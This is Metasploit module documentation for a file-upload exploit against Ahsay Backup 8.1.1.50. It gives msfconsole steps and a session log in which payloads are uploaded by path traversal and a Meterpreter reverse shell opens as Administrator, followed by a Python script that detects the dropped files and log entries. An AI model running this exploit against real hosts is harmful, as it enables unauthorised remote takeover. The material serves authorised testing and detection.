## Vulnerable Application

Ahsay Backup v7.x - v8.1.1.50

Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`

Start the application (I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`).

## Verification Steps

1. Start `msfconsole`
2. `use exploit/windows/misc/ahsay_fileupload`
3. Enable trial account creation: `set CREATEACCOUNT true`
4. Set RHOST: `set RHOST 172.16.238.175`
5. Set LHOST: `set LHOST 172.16.238.235`
6. Run the exploit: `run`
7. We should receive a Meterpreter shell.

## Options

CREATEACCOUNT - Create a trial account. Use this when trial account creation is enabled on the target and you do not have valid credentials.

PASSWORD - Password for the Ahsay user account. If CREATEACCOUNT is set, this password is used for the account that gets created.

RHOST - Target address.

RPORT - The target port (TCP).

TARGETURI - Path to the Ahsay installation.

UPLOADPATH - Path to where the file should be uploaded.

USERNAME - Username of the Ahsay account. If CREATEACCOUNT is set, this username is used for the account that gets created.

## Scenarios

### Ahsay 8.1.1.50 on Windows 2003 SP2

```
msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator
```
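The session above leaves two artifacts on the target (a `.exe` payload and a `.jsp` stager under `webapps/cbs/help/en/`) and one tell-tale request in the web server log (the `GET` for the dropped `.jsp`). The following script is an added example, not code from the Metasploit module or from Ahsay: it pulls the cleanup paths out of the module's output, flags files in the help tree whose names match the module's random-name pattern, and picks the stager request out of an access log. It assumes that the help tree holds only static content (so any `.jsp`/`.exe` there is foreign), that the module always uses ten random letters for the file name (only two samples are visible on the page, so this is an assumption), and that the server writes a combined-format access log; the log lines and module output it scans are constructed sample data.

```python
"""Artifact and log check after running exploit/windows/misc/ahsay_fileupload.

Added example, not part of the Metasploit module or of Ahsay CBS.
Assumptions (not stated on the page): the help tree under webapps/cbs/help/<lang>/
contains only static help content, the module names its dropped files with ten
random letters, and the web server writes a combined-format access log.
"""
import os
import re
from typing import Iterable, List, Tuple

# Dropped files seen in the session: lcofxnrzON.exe and myjnJMFlNi.jsp.
# Ten random letters plus .jsp/.exe is assumed to be the module's convention.
DROPPED_NAME = re.compile(r"^[A-Za-z]{10}\.(?:jsp|exe)$")

# Metasploit prints one "[!] ... manual cleanup of '<path>' ..." line per leftover file.
CLEANUP_LINE = re.compile(r"manual cleanup of '([^']+)'")

# The stager is triggered with a request for /cbs/help/<lang>/<10 letters>.jsp;
# the trailing [^"]* tolerates a query string and the HTTP version.
TRIGGER_REQ = re.compile(
    r'"(?:GET|POST) (/cbs/help/[^/ ]+/[A-Za-z]{10}\.jsp)[^"]*" (\d{3})'
)


def cleanup_paths_from_msf_output(output: str) -> List[str]:
    """Return the paths the module reported as needing manual cleanup, in order."""
    return CLEANUP_LINE.findall(output)


def is_dropped_artifact(path: str) -> bool:
    """True if the file name matches the dropped-file pattern.

    Splits on both separators so a Windows path can be checked from a Linux host.
    """
    name = re.split(r"[\\/]", path)[-1]
    return DROPPED_NAME.match(name) is not None


def find_dropped_files(help_root: str) -> List[str]:
    """Walk the help tree and return every file that looks like a dropped payload/stager."""
    hits = []
    for dirpath, _dirs, files in os.walk(help_root):
        for name in files:
            if is_dropped_artifact(name):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def trigger_requests(log_lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (request path, status code) for log entries that hit a dropped JSP."""
    hits = []
    for line in log_lines:
        m = TRIGGER_REQ.search(line)
        if m:
            hits.append((m.group(1), m.group(2)))
    return hits


# Constructed sample data for the example; not captured from a real system.
SAMPLE_MSF_OUTPUT = (
    "[!] This exploit may require manual cleanup of "
    "'../../webapps/cbs/help/en/lcofxnrzON.exe' on the target\n"
    "[!] This exploit may require manual cleanup of "
    "'../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target\n"
)

SAMPLE_ACCESS_LOG = [
    '172.16.238.235 - - [16/Jul/2019:14:59:40 +0200] "GET /cbs/help/en/index.html HTTP/1.1" 200 5120',
    '172.16.238.235 - - [16/Jul/2019:14:59:44 +0200] "GET /cbs/help/en/myjnJMFlNi.jsp HTTP/1.1" 200 0',
    '172.16.238.50 - - [16/Jul/2019:15:01:02 +0200] "GET /cbs/help/en/chapter1.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for p in cleanup_paths_from_msf_output(SAMPLE_MSF_OUTPUT):
        print("module asked for cleanup of:", p)
    for path, status in trigger_requests(SAMPLE_ACCESS_LOG):
        print("stager request in log:", path, status)
    # Point this at <AhsayCBS>/webapps/cbs/help on a real host to list leftovers.
    for f in find_dropped_files(r"C:\Program Files\AhsayCBS\webapps\cbs\help"):
        print("leftover file:", f)
```

The `../../` in the cleanup paths is relative to the module's upload base, which the page does not state, so the script reports those paths verbatim rather than resolving them; `find_dropped_files` is the reliable way to locate the files, given the install root.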